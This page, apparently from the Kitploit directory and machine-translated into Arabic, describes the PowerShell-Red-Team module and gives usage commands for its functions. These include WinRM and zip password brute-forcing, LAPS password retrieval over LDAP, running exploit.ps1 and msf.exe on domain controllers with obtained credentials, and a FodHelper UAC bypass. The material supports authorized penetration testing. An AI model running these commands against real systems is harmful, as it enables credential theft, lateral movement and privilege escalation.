Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PowerShell-Red-Team — مجموعة دوال باورشيل قد يستخدمها فريق الاختراق الأحمر في تمرين | Kitploit
أدوات/GitHubGitHub/tobor88/powershell-red-team
تصعيد الامتيازاتهجمات كلمات المرورالحركة الجانبيةجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubtobor88/powershell-red-team

PowerShell-Red-Team

مجموعة دوال باورشيل قد يستخدمها فريق الاختراق الأحمر في تمرين

عرض المستودع
5519260منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PowerShell-Red-Team-Enum

مجموعة من دوال PowerShell يمكن لعضو الفريق الأحمر استخدامها لجمع البيانات من جهاز أو الحصول على وصول إلى هدف. أضفت ملفات ps1 للأوامر المضمنة في وحدة RedTeamEnum. سيتيح لك ذلك العثور بسهولة على أمر واحد فقط واستخدامه إذا كان هذا هو كل ما تريده. إذا كنت تريد الوحدة بأكملها، فقم بتنفيذ الإجراءات التالية بعد تنزيل دليل RedTeamEnum ومحتوياته إلى جهازك.

C:\PS> robocopy .\RedTeamEnum $env:USERPROFILE\Documents\WindowsPowerShell\Modules\RedTeamEnum *
# سيؤدي هذا إلى نسخ الوحدة إلى موقع يسمح لك باستيرادها بسهولة. إذا كنت تستخدم مزامنة OneDrive، فقد تحتاج إلى استخدام $env:USERPROFILE\OneDrive\Documents\WindowsPowerShell\Modules\RedTeamEnum بدلاً من ذلك.

C:\PS> Import-Module -Name RedTeamEnum -Verbose
# سيؤدي هذا إلى استيراد جميع الأوامر في الوحدة.

C:\PS> Get-Command -Module RedTeamEnum
# سيعرض هذا قائمة بجميع الأوامر في الوحدة.
  • Convert-Base64.ps1 هي دالة كما يوحي اسمها لتشفير و/أو فك تشفير النص إلى تنسيق Base64.
C:\PS> Convert-Base64 -Value "Convert me to base64!" -Encode

C:\PS> Convert-Base64 -Value "Q29udmVydCBtZSB0byBiYXNlNjQh" -Decode
  • Convert-StringToHash.ps1 هي دالة لتحويل قيمة سلسلة إلى قيمة تجزئة.
C:\PS> Convert-StringToHash -String "Convert me to base64!"
C:\PS> Convert-StringToHash -String "Password123" -Encoding UTF8 -Algorithm MD5
# يحول كلا المثالين أعلاه السلسلة Password123 إلى قيمة تجزئة MD5
  • Convert-SID.ps1 هي دالة تقوم بتحويل قيم SID إلى أسماء مستخدمين وأسماء مستخدمين إلى قيم SID.
C:\PS> Convert-SID -Username tobor
# يحول المثال أعلاه قيمة SID الخاصة بـ tobor

C:\PS> Convert-SID -SID S-1-5-21-2860287465-2011404039-792856344-500
# يحول المثال أعلاه قيمة SID إلى اسم المستخدم المرتبط بها
  • Test-BruteZipPassword هي دالة تستخدم ملف كلمات مرور لاختراق ملف مضغوط محمي بكلمة مرور باستخدام 7zip.
C:\PS> Test-BruteForceZipPassword -PassFile 'C:\Users\USER\Downloads\Applications\pass.txt' -Path 'C:\Users\USER\Downloads\Applications\KiTTY.7z' -ZipExe 'C:\Program Files\7-Zip\7z.exe'
# يستخدم هذا المثال كلمات المرور في ملف pass.txt لاختراق ملف KiTTY.7z المحمي بكلمة مرور
  • Test-BruteForceCredentials هي دالة تستخدم WinRM لاختراق كلمة مرور مستخدم.
C:\PS> Test-BruteForceCredentials -ComputerName DC01.domain.com -UseSSL -Username 'admin','administrator' -Passwd 'Password123!' -SleepMinutes 5
# سيختبر هذا المثال كلمة المرور المحددة ضد كل من المستخدمين admin و administrator على الكمبيوتر البعيد DC01.domain.com باستخدام WinRM عبر HTTPS مع فاصل زمني قدره 5 دقائق بين كل محاولة

C:\PS> Test-BruteForceCredentials -ComputerName File.domain.com -UserFile C:\Temp\users.txt -PassFile C:\Temp\rockyou.txt
# سيختبر هذا المثال كل كلمة مرور في rockyou.txt ضد كل اسم مستخدم في ملف users.txt دون أي توقف بين المحاولات
  • Get-LdapInfo هي دالة أنا فخور بها جدًا لأداء استعلامات LDAP عامة. على الرغم من ظهور خاصيتين فقط في الإخراج، يمكن رؤية جميع الخصائص المرتبطة بالكائن عن طريق الأنابيب إلى Select-Object -Property * أو استخدام معلمة التبديل -Detailed.
C:\PS> Get-LdapInfo -Detailed -SPNNamedObjects -Domain domain.com -Credential (Get-Credential)
# يعيد المثال أعلاه جميع خصائص الكائنات التي تم إرجاعها في domain.com
#
C:\PS> Get-LdapInfo -DomainControllers | Select-Object -Property 'Name','ms-Mcs-AdmPwd'
# إذا تم تشغيل هذا كمسؤول، فسيعيد كلمة مرور LAPS لحساب المسؤول المحلي
#
C:\PS> Get-LdapInfo -ListUsers | Where-Object -Property SamAccountName -like "user.samname"
# ملاحظة: إذا قمت بتضمين مفتاح "-Detailed" وقمت بتوجيه الإخراج إلى Where-Object، فلن يتم إرجاع أي خصائص. إذا كنت ترغب في عرض جميع خصائص نتيجتك، فسيلزم تنفيذ ذلك باستخدام التنسيق أدناه
#
C:\PS> Get-LdapInfo -AllServers | Where-Object -Property LogonCount -gt 1 | Select-Object -Property *

  • Get-NetworkShareInfo هو أمر cmdlet يُستخدم لاسترداد المعلومات و/أو اختراق اكتشاف المشاركات الشبكية المتاحة على جهاز بعيد أو محلي.
C:\PS> Get-NetworkShareInfo -ShareName C$
# يعيد المثال أعلاه معلومات حول المشاركة C$ على الجهاز المحلي
#النتائج
Name         : C$
InstallDate  :
Description  : Default share
Path         : C:\
ComputerName : TOBORDESKTOP
Status       : OK

C:\PS> Get-NetworkShareInfo -ShareName NETLOGON,SYSVOL,C$ -ComputerName DC01.domain.com, DC02.domain.com, 10.10.10.1
# يكتشف المثال أعلاه ويعيد معلومات حول NETLOGON و SYSVOL و C$ على الأجهزة البعيدة الثلاثة DC01 و DC02 و 10.10.10.1
  • Test-PrivEsc هي دالة يمكن استخدامها لمعرفة ما إذا كانت تحديثات WSUS عبر HTTP معرضة لـ PrivEsc، أو إذا كانت بيانات الاعتماد النصية الصريحة مخزنة في أماكن شائعة، أو إذا كان AlwaysInstallElevated معرضًا لـ PrivEsc، أو إذا كانت مسارات الخدمات غير المقتبسة موجودة، وتعداد الأذونات الضعيفة المحتملة للكتابة للخدمات.
 C:\PS> Test-PrivEsc
  • Get-InitialEnum هي دالة لتعداد أساسيات نظام تشغيل Windows للمساعدة في عرض نقاط الضعف المحتملة بشكل أفضل.
 C:\PS> Get-InitialEnum
  • Start-SimpleHTTPServer هي دالة تُستخدم لاستضافة خادم HTTP لتنزيل الملفات. تم تصميمها لتكون مشابهة لوحدة SimpleHTTPServer في بايثون. الدلائل غير قابلة للتصفح عبر خادم الويب. الملفات التي سيتم استضافتها للتنزيل ستكون من الدليل الحالي الذي تتواجد فيه عند إصدار هذا الأمر.
C:\PS> Start-SimpleHTTPServer
افتح خادم HTTP على المنفذ 8000

#أو
C:\PS> Start-SimpleHTTPServer -Port 80
# افتح خادم HTTP على المنفذ 80
  • Invoke-PortScan.ps1 هي دالة لمسح جميع منافذ TCP الممكنة على هدف. سأقوم بتحسينها في المستقبل من خلال تضمين UDP بالإضافة إلى إمكانية تعريف نطاق من المنافذ. honestly, هذه الدالة لا تستحق الاستخدام حتى لأنها بطيئة جدًا. تعدد الخيوط هو نقطة ضعف لدي وأخطط للعمل عليها مع هذه الدالة.
 C:\PS> Invoke-PortScan -IpAddress 192.168.0.1
  • Invoke-PingSweep هي دالة تُستخدم لأداء مسح ping لنطاق شبكة فرعية.
C:\PS> Invoke-PingSweep -Subnet 192.168.1.0 -Start 192 -End 224 -Source Singular
# ملاحظة: معلمة المصدر تعمل فقط إذا كانت قيمة توجيه مصدر IP هي "Yes"

C:\PS> Invoke-PingSweep -Subnet 10.0.0.0 -Start 1 -End 20 -Count 2
# القيمة الافتراضية للعدد هي 1

C:\PS> Invoke-PingSweep -Subnet 172.16.0.0 -Start 64 -End 128 -Count 3 -Source Multiple
  • Invoke-UseCreds هي دالة أنشأتها لتبسيط عملية استخدام بيانات الاعتماد التي تم الحصول عليها أثناء اختبار الاختراق. أستخدم -Passwd بدلاً من -Password لأن تلك المعلمة عند تعريفها يجب أن تُكوّن كسلسلة آمنة، وهذا ليس هو الحال عند إدخال قيمة في هذا الحقل مع هذه الدالة. يتم تحويلها إلى سلسلة آمنة بعد تعيين تلك القيمة.
# سيقوم الأمر أدناه باستخدام بيانات الاعتماد المدخلة لفتح الملف التنفيذي msf.exe كمستخدم tobor
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\msf.exe -Verbose

يمكن استخدام هذا الأمر cmdlet أيضًا لتنفيذ الملفات الموجودة على جهازك المحلي وتنفيذها على جهاز بعيد

# سيستخدم الأمر أدناه بيانات الاعتماد المدخلة لفتح الملف التنفيذي exploit.ps1 كمستخدم tobor على DC01 و DC02 باستخدام WinRM
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\exploit.ps1 -ComputerName "DC01.domain.com","DC02.domain.com"

# سيستخدم الأمر أدناه بيانات الاعتماد المدخلة لفتح الملف التنفيذي exploit.ps1 كمستخدم tobor على DC01 و DC02 باستخدام WinRM عبر HTTPS
C:\PS> Invoke-UseCreds -Username 'OsbornePro\tobor' -Passwd 'P@ssw0rd1' -Path .\exploit.ps1 -ComputerName "DC01.domain.com","DC02.domain.com" -UseSSL
  • Invoke-FodHelperBypass هي دالة تختبر ما إذا كان تجاوز UAC سيعمل قبل تنفيذه لرفع الامتيازات. بالطبع، يجب تشغيل هذا بواسطة عضو في مجموعة المسؤولين المحليين لأن هذا التجاوز يرفع امتيازات الصدفة التي تعمل فيها. يمكنك تعريف البرنامج لتشغيله والذي سيسمح لك بتنفيذ حمولات msfvenom بالإضافة إلى cmd أو powershell أو مجرد إصدار أوامر.
C:\PS> Invoke-FodHelperBypass -Program "powershell" -Verbose
# أو
C:\PS> Invoke-FodHelperBypass -Program "cmd /c msf.exe" -Verbose
تنزيل الأداة